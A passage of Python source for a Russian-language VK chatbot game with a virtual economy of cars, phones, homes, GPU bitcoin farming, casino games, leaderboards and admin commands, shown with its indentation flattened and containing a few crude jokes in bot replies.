ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 100000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 100.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "RX 580":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 300000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 300.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "RX5700":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 500000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 500.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "RX6900XT":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 1500000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 1.500.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["gpu"] == "nVidia Tesla A100":
if ff["gpu_amount"] == 1:
ff["gpu"] = ""
ff["gpu_amount"] -= 1
ff["balance"] += 5000000
ff["farm"] = 0.0
ff["farming"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою видеокарту за 5.000.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return 'У вас нет видеокарты!'
def bcar(id, n):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["car"] == "":
if n == '1' and ff["balance"] >= 2000:
ff["balance"] -= 2000
ff["car"] = "ВАЗ 2115"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["car"]) + " за 2.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '2' and ff["balance"] >= 4000:
ff["balance"] -= 4000
ff["car"] = "LADA Vesta"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["car"]) + " за 4.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '3' and ff["balance"] >= 8000:
ff["balance"] -= 8000
ff["car"] = "Audi Q7"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["car"]) + " за 8.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '4' and ff["balance"] >= 15000:
ff["balance"] -= 15000
ff["car"] = "BMW M8"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["car"]) + " за 15.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '5' and ff["balance"] >= 50000:
ff["balance"] -= 50000
ff["car"] = "Range Rover"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["car"]) + " за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '6' and ff["balance"] >= 150000:
ff["balance"] -= 150000
ff["car"] = "Rolls-Royce"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["car"]) + " за 150.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "У вас не хватает денег или вы неправильно используете команду!\nПример: кмашину 1"
else:
return "У вас уже есть машина или вы неправильно используете команду!\nПример: кмашину 1\nЧтобы продать её, используйте 'пмашину'"
def sellcar(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["car"] != "":
if ff["car"] == "ВАЗ 2115":
ff["car"] = ""
ff["balance"] += 2000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою машину за 2.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["car"] == "LADA Vesta":
ff["car"] = ""
ff["balance"] += 4000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою машину за 4.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["car"] == "Audi Q7":
ff["car"] = ""
ff["balance"] += 8000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою машину за 8.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["car"] == "BMW M8":
ff["car"] = ""
ff["balance"] += 15000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою машину за 15.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["car"] == "Range Rover":
ff["car"] = ""
ff["balance"] += 50000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою машину за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["car"] == "Rolls-Royce":
ff["car"] = ""
ff["balance"] += 150000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свою машину за 150.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return 'У вас нет машины!'
# машины
# телефоны
def bphone(id, n):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["phone"] == "":
if n == '1' and ff["balance"] >= 200:
ff["balance"] -= 200
ff["phone"] = "Fly Ezzy Flip"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["phone"]) + " за 200$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '2' and ff["balance"] >= 1000:
ff["balance"] -= 1000
ff["phone"] = "Sony Xperia XA1"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["phone"]) + " за 1.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '3' and ff["balance"] >= 10000:
ff["balance"] -= 10000
ff["phone"] = "Xiaomi Mi 11"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["phone"]) + " за 10.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '4' and ff["balance"] >= 50000:
ff["balance"] -= 50000
ff["phone"] = "Samsung Galaxy S21"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["phone"]) + " за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '5' and ff["balance"] >= 200000:
ff["balance"] -= 200000
ff["phone"] = "iPhone 12"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["phone"]) + " за 200.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "У вас не хватает денег или вы неправильно используете команду!\nПример: ктел 1"
else:
return "У вас уже есть телефон или вы неправильно используете команду!\nПример: ктел 1\nЧтобы продать его, используйте 'птел'"
def sellphone(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["phone"] != "":
if ff["phone"] == "Fly Ezzy Flip":
ff["balance"] += 200
ff["phone"] = ""
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой телефон за 200$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["phone"] == "Sony Xperia XA1":
ff["phone"] = ""
ff["balance"] += 1000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой телефон за 1.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["phone"] == "Xiaomi Mi 11":
ff["phone"] = ""
ff["balance"] += 10000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой телефон за 10.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["phone"] == "Samsung Galaxy S21":
ff["phone"] = ""
ff["balance"] += 50000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой телефон за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["phone"] == "iPhone 12":
ff["phone"] = ""
ff["balance"] += 200000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой телефон за 200.000$\nВаш баланс: " + str(ff["balance"]) + "$"
if ff["phone"] == "iPhone 12 Gold Edition":
ff["phone"] = ""
ff["balance"] += 1000000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой телефон за 1.000.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return 'У вас нет телефона!'
# телефоны
# дома
def bhome(id, n):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["home"] == "":
if n == '1' and ff["balance"] >= 100:
ff["balance"] -= 100
ff["home"] = "Картонная коробка"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 100$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '2' and ff["balance"] >= 2000:
ff["balance"] -= 2000
ff["home"] = "Дом на дереве"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 2.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '3' and ff["balance"] >= 10000:
ff["balance"] -= 10000
ff["home"] = "Деревянный дом"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 10.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '4' and ff["balance"] >= 50000:
ff["balance"] -= 50000
ff["home"] = "Квартира в новостройке"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '5' and ff["balance"] >= 150000:
ff["balance"] -= 150000
ff["home"] = "Особняк"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 150.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '6' and ff["balance"] >= 300000:
ff["balance"] -= 300000
ff["home"] = "Дом на Рублёвке"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 300.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '7' and ff["balance"] >= 500000:
ff["balance"] -= 500000
ff["home"] = "Личный остров"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 500.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif n == '8' and ff["balance"] >= 1000000:
ff["balance"] -= 1000000
ff["home"] = "Дворец в Геленджике"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
congrts(id)
return "Вы купили " + str(ff["home"]) + " за 1.000.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return "У вас не хватает денег или вы неправильно используете команду!\nПример: кдом 1"
else:
return "У вас уже есть дом или вы неправильно используете команду!\nПример: кдом 1\nЧтобы продать его, используйте 'пдом'"
def sellhome(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["home"] != "":
if ff["home"] == "Картонная коробка":
ff["balance"] += 100
ff["home"] = ""
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 100$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Дом на дереве":
ff["home"] = ""
ff["balance"] += 2000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 2.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Деревянный дом":
ff["home"] = ""
ff["balance"] += 10000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 10.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Квартира в новостройке":
ff["home"] = ""
ff["balance"] += 50000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 50.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Особняк":
ff["home"] = ""
ff["balance"] += 150000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 150.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Дом на Рублёвке":
ff["home"] = ""
ff["balance"] += 300000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 300.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Личный остров":
ff["home"] = ""
ff["balance"] += 500000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 500.000$\nВаш баланс: " + str(ff["balance"]) + "$"
elif ff["home"] == "Дворец в Геленджике":
ff["home"] = ""
ff["balance"] += 1000000
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы продали свой дом за 1.000.000$\nВаш баланс: " + str(ff["balance"]) + "$"
else:
return 'У вас нет дома!'
# дома
# Топ
def sortbybal(str):
a = int(str.split(":")[0])
return a
def sortbybtc(str):
a = float(str.split(":")[0])
return a
def baltop():
a=[]
path = "json/"
f=list(os.listdir(path))
for i in range (len(f)):
f[i] = str(f[i][0:-5])
for i in f:
id = i
try:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["balance"] > 1000:
if ff["nick"] != "":
a.append(str(str(ff["balance"]) + ":" + "@id" + str(id) + " (" + ff["nick"] + ")"))
else:
user = vk.method("users.get", {"user_ids": id})
a.append(str(str(ff["balance"]) + ":" + "@id" + str(id) + " (" + user[0]['first_name'] + ")"))
except:
return
a = sorted(a, key=sortbybal, reverse=True)
for i in range(len(a)):
a[i] = str(i+1) + ". " + str(a[i].split(":")[1]) + " | " + str(a[i].split(":")[0]) + "$"
threading.Thread(target=reloadtop, args=()).start()
global topbal
topbal = "📜 Топ по балансу:\n\n" + "\n".join(a[:10]) + "\n\nОбновление каждые 5 минут"
def btctop():
a=[]
path = "json/"
f=list(os.listdir(path))
for i in range (len(f)):
f[i] = str(f[i][0:-5])
for i in f:
id = i
try:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["btc"] != 0.0:
if ff["nick"] != "":
a.append(str(str(ff["btc"]) + ": " + "@id" + str(id) + " (" + ff["nick"] + ")"))
else:
user = vk.method("users.get", {"user_ids": id})
a.append(str(str(ff["btc"]) + ": " + "@id" + str(id) + " (" + user[0]['first_name'] + ")"))
except:
return
a = sorted(a, key=sortbybtc, reverse=True)
for i in range(len(a)):
a[i] = str(i+1) + ". " + str(a[i].split(":")[1]) + " | " + str(round(float(a[i].split(":")[0]),5)) + "₿"
global topbtc
topbtc = "📜 Топ по биткоинам:\n\n" + "\n".join(a[:10]) + "\n\nОбновление каждые 5 минут"
threading.Thread(target=reloadtopbtc, args=()).start()
def reloadtop():
threading.Timer(300.0, baltop, args=()).start()
def reloadtopbtc():
try:
threading.Timer(300.0, btctop, args=()).start()
except:
btctop()
# Топ
# Хакерство
def botfightstart(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
bothp = random.randint(1,ff["hhp"])
botdef = random.randint(1,ff["hdef"])
botdmg = random.randint(1,ff["hdamage"])
def botfightwait(id):
return
def botfight(id):
return
# Хакерство
def mailing(body):
path = "json.dump/"
f = list(os.listdir(path))
for i in range(len(f)):
f[i] = str(f[i][0:-5])
for i in f:
id = i
vk.method("messages.send", {"peer_id": id,
"message": body,
"random_id": random.randint(1, 2147483647)})
return "Рассылка завершена!"
def workreset():
path = "json/"
f = list(os.listdir(path))
for i in range(len(f)):
f[i] = str(f[i][0:-5])
for i in f:
id = i
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
ff["wstatus"] = False
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
threading.Thread(target=workreset, args=()).start()
threading.Thread(target=btcfarmreload, args=()).start()
threading.Thread(target=baltop, args=()).start()
threading.Thread(target=btctop, args=()).start()
# btcratestart()
log("system", "Бот запущен")
while True:
try:
messages = vk.method("messages.getConversations", {"offset": 0, "count": 20, "filter": "unanswered"})
if messages["count"] >= 1 and messages["items"][0]["conversation"]["peer"]["type"] == 'user':
id = messages["items"][0]["last_message"]["from_id"]
body = messages["items"][0]["last_message"]["text"]
c = 1
path = "json/"
u = os.listdir(path)
for i in range(len(u)):
u[i] = str(u[i][:-5])
c += 1
if str(id) not in u:
vk.method("messages.send", {"peer_id": id,
"message": prof(id) + "\n\n💎 Добро пожаловать в главное меню",
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
try:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
except:
prof(id)
allow = ["репорт", "профиль", "проф", "unban"]
if True and str(body) != "":
if ff["banned"] == "NO" or body.lower().split(" ")[0] in allow:
if str(body.lower()).split()[0] == 'репорт':
temp = str(body.lower()).split("репорт")
msg = temp[1]
if len(msg) > 1:
vk.method("messages.send", {"peer_id": id,
"message": report(str(id), msg),
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "⚠ Вы пытаетесь отправить пустой репорт!",
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == "toall":
if id in admins:
temp = str(body).split("toall")[1]
vk.method("messages.send", {"peer_id": id,
"message": mailing(temp),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор!",
"random_id": random.randint(1, 2147483647)})
# Меню
elif body.lower() == "🏠 главное меню":
vk.method("messages.send", {"peer_id": id,
"message": "💎 Добро пожаловать в главное меню",
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "начать" or body.lower() == "start":
vk.method("messages.send", {"peer_id": id,
"message": "Удачи в развитии!",
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
# Меню
elif body.lower() == 'пинг':
vk.method("messages.send", {"peer_id": id,
"message": "Не Миша,всё хуйня! Давай по новой!",
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'хелп' or body.lower() == 'помощь' or body.lower() == 'команды':
vk.method("messages.send", {"peer_id": id,
"message": help(),
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'пхелп':
if id in admins or id in moders:
vk.method("messages.send", {"peer_id": id,
"message": staffhelp(),
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'админпанель':
if id in admins or id in moders:
vk.method("messages.send", {"peer_id": id,
"message": "Ну раз тебе так хочется,то на",
"keyboard": adminmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'профиль' or body.lower() == 'проф':
vk.method("messages.send", {"peer_id": id,
"message": prof(id),
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'баланс' or body.lower() == 'бал':
vk.method("messages.send", {"peer_id": id,
"message": bal(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'стата':
vk.method("messages.send", {"peer_id": id,
"message": gstats(id),
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "анекдот":
vk.method("messages.send",
{"peer_id": id, "message": getanekdot(), "random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'кстата':
if len(str(body).split()) == 3:
temp = str(body).split(" ")
nick = temp[1]
idd = temp[2]
stats(nick, idd)
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "⚠Для показа статистики введите ник и id Battle.net через пробел. Пример: кстата Vlad 214228⚠",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'кстат20':
if len(body.split(" ")) == 3:
temp = str(body).split(" ")
nick = temp[1]
idd = temp[2]
stats20(nick, idd)
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "⚠Для показа статистики введите ник и id Battle.net через пробел. Пример: кстат20 Vlad 214228⚠",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'сбал':
if id in admins or id in moders:
if len(str(body).split()) == 2:
temp = str(body).split(" ")
val = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": cbal(id,val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'дбал':
if id in admins:
if len(str(body).split()) == 3:
temp = str(body).split(" ")
val = temp[2]
idd = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": dbal(idd, val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'дпроф':
if id in admins or id in moders:
if len(str(body).split()) == 2:
temp = str(body).split(" ")
idd = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": dprof(idd),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'сбитк':
if id in admins or id in moders:
if len(str(body).split()) == 2:
temp = str(body).split(" ")
val = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": cbtc(id, val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'слвл':
if id in admins or id in moders:
if len(str(body).split()) == 2:
temp = str(body).split(" ")
val = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": clvl(id, val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'сопыт':
if id in admins or id in moders:
if len(str(body).split()) == 2:
temp = str(body).split(" ")
val = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": cexp(id, val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'пoлная накрутка':
if id in admins or id in moders:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
cbal(id, "1000000")
cbtc(id, "5000.0")
clvl(id, "5")
cexp(id, "500")
ff["balance"] = 1000000
ff["bank"] = 1000000
ff["car"] = "Tesla model S"
ff["home"] = "Личный остров со шлюхами"
ff["phone"] = "iPhone 12 Gold Edition"
ff["gpu"] = "nVidia Tesla A100"
ff["farming"] = True
ff["gpu_amount"] = 5
ff["farm"] = 0.1
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": id,
"message": "Накрутка завершена!",
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'oбнуление':
if id in admins or id in moders:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
cbal(id, "1000")
cbtc(id, "0.0")
clvl(id, "1")
cexp(id, "0")
ff["balance"] = 0
ff["bank"] = 0
ff["car"] = ""
ff["home"] = ""
ff["phone"] = ""
ff["gpu"] = ""
ff["gpu_amount"] = 0
ff["farm"] = 0.0
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": id,
"message": "Обнуление завершено!",
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == "игры" or body.lower() == "⬅ игры":
vk.method("messages.send",
{"peer_id": id,
"message": games(),
"keyboard": gamesmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "биткоины" or body.lower() == "биткоин" or body.lower() == "битки" or body.lower() == "битк":
vk.method("messages.send",
{"peer_id": id,
"message": "Выберите что вы хотите сделать\n" + bal(id),
"keyboard": btcmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'казино' or str(body).split()[0] == 'казик':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
amount = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": kaz(id, amount),
"keyboard": kazmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Добро пожаловать в казино!",
"keyboard": kazmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'казино' or str(body).split()[0] == 'казик':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
amount = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": kaz(id, amount),
"keyboard": kazmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'монеточка' or str(body.lower()).split()[0] == 'монетка':
if len(str(body).split()) >= 3:
temp = str(body).split(" ")
side = temp[1]
amount = temp[2]
vk.method("messages.send", {"peer_id": id,
"message": monetka(id, side , amount),
"keyboard": monetkasidemenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Обычная игра в монеточку\nВыберите сторону [Орел или Решка] и укажите сткаву\nПример: Монетка орел 1000",
"keyboard": monetkasidemenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif body.lower() == "орел":
vk.method("messages.send",
{"peer_id": id,
"message": "Вы выбрали Орла",
"keyboard": monetkaorelmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "решка":
vk.method("messages.send",
{"peer_id": id,
"message": "Вы выбрали Решку",
"keyboard": monetkareshkamenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'сник':
if len(str(body).split()) >= 2:
temp = str(body).split("сник")
nickk = temp[1][1:]
vk.method("messages.send", {"peer_id": id,
"message": nick(id, nickk),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Ваш ник пустой\nПример: 'сник Владимир Путин'",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'дник':
if id in admins:
if len(str(body).split()) == 3:
temp = str(body).split(" ")
idd = temp[1]
nickk = temp[2]
vk.method("messages.send", {"peer_id": id,
"message": dnick(idd, nickk),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'работать' or body.lower() == '💻 работать':
vk.method("messages.send", {"peer_id": id,
"message": work(str(id)),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'уволиться':
vk.method("messages.send", {"peer_id": id,
"message": dwork(str(id)),
"keyboard": mainworkmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'устроиться':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
val = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": hwork(str(id), val),
"keyboard": worksmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": works(id),
"keyboard": worksmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'users':
if id in admins or id in moders:
if len(str(body).split()) == 1:
vk.method("messages.send", {"peer_id": id,
"message": ulist(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор или Модератор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'gban':
if id in admins:
if len(str(body).split()) == 3:
temp = str(body).split(" ")
idd = temp[1]
rsn = temp[2]
